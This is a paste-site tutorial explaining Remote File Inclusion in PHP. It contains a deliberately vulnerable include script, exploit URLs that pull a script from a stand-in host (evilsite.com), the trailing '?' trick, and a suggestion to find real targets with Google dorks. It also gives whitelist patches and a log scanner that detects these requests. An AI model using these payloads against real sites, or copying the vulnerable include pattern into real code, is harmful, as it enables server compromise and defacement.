Kyfx

What is an RFI? and how to do it

Jul 3rd, 2015
What Is RFI?
RFI stands for Remote File Inclusion. It allows the attacker to get a custom coded/malicious file included and run on a website or server through a vulnerable script. The vulnerability exploits the poor validation checks in websites and can eventually lead to code execution on the server, or to code execution in the website's pages (an XSS attack using JavaScript) *client sided shiZ*.

RFI is a common vulnerability and trust me, not all website hacking is about SQL injection. Using RFI you can literally deface the websites *if that's what you're looking for :| *, get access to the server and do almost anything. What makes it more dangerous is that you only need common sense and basic knowledge of PHP to pull this one off; some BASH might come in handy too, as most servers today are hosted on Linux.

Starting with RFI ~
Let's get it started. The first step is to find a vulnerable site; you can easily find them using Google dorks. If you can't find one, don't worry, you'll still learn - just upload this on any site and save it as index.php in a folder called rfi

PHP Code:
<?php
# AnonGuy's RFI Tutorial @ XplOitWorld
$file = $_GET['file'];
if ($file != null) { include($file . ".html"); }
?>

and save this as tut.html

HTML Code:
<html>
<body>
<center><h1>RFI</h1></center>
</body>
</html>

then visit the page in your browser.

As you can see, this code (index.php) takes the file parameter, adds .html to the end and "includes" it.
If this isn't coded properly, the script doesn't check where the file is coming from, so an inclusion from another site will be accepted and run natively on the server. This means that a text file containing a PHP script can be hosted on another site but still run on the site being targeted. Let's try it out.

Code:
http://yoursite.com/rfi/index.php?file=http://evilsite.com/evilscript.txt

Warning: include(...): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/yoursite/public_html/rfi/index.php on line 4

Error!

Just like we have the %00 to get rid of the .html part in LFI, you have the "?" sign in RFI. If you go to index.php?file=http://evilsite.com/evilscript.txt? it will include evilscript.txt and not evilscript.txt.html, because the ? sign turns .html into a GET argument, which does not affect which file you are requesting on the remote server.


Code:
http://yoursite.com/rfi/index.php?file=http://evilsite.com/evilscript.txt?

Voila!

Now we know how to exploit an RFI vulnerability, umm, err.. but how to patch one?

Here you go

How To Patch RFI/LFI ~
Method One (Switch Statement) ~

PHP Code:
<?php
# Only the fixed, hard-coded file names below can ever be included.
$file = isset($_GET['file']) ? $_GET['file'] : '';
switch ($file) {
    case "about":
        include("aboutus.html");
        break;
    case "contact":
        include("contactus.html");
        break;
    default: # If parameter != contact or about
        include("tut.html");
        break;
}
?>


Method Two (If Statement) ~

PHP Code:
<?php
$file = isset($_GET['file']) ? $_GET['file'] : null;
if (isset($file))
{
    if ($file === "about")
    {
        include("aboutus.html");
    }
    elseif ($file === "contact")
    {
        include("contactus.html");
    }
    else
    {
        include("tut.html"); # If file param != about or contact
    }
}
else
{
    include("tut.html"); # If someone visits the file w/o file param
}
?>
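Patching the include is the fix; as an added defender-side example (my code, not part of the original paste), the Python below complements it by scanning web server access logs for the remote-include requests shown in the exploit section, including the trailing "?" trick. It assumes Apache/Nginx combined log format; the four log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in combined log format (not real traffic): a normal request,
# the plain remote include, the same URL-encoded with the trailing "?" trick, and an allowed value.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jul/2015:10:01:02 +0000] "GET /rfi/index.php?file=tut HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Jul/2015:10:01:09 +0000] "GET /rfi/index.php?file=http://evilsite.com/evilscript.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Jul/2015:10:01:15 +0000] "GET /rfi/index.php?file=http%3A%2F%2Fevilsite.com%2Fevilscript.txt%3F HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jul/2015:10:02:00 +0000] "GET /rfi/index.php?file=about HTTP/1.1" 200 600 "-" "curl/7.43"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Schemes that make PHP's include() fetch over the network or read a stream wrapper
# (when allow_url_include is on); any of them inside a query value is suspect.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:", "expect://")

def decode_param(value):
    """Undo one extra layer of URL-encoding (parse_qsl already removed the first)."""
    return unquote(value) if "%" in value else value

def find_rfi_attempts(log_text):
    """Return one record per query parameter whose value names a remote or stream URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip rather than guess
        query = urlsplit(m["target"]).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = decode_param(raw).strip()
            if value.lower().startswith(REMOTE_SCHEMES):
                hits.append({
                    "ip": m["ip"],
                    "param": name,
                    "value": value,
                    "status": int(m["status"]),
                    # a trailing "?" pushes the script's appended suffix into the query string
                    "trailing_qmark": value.endswith("?"),
                })
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```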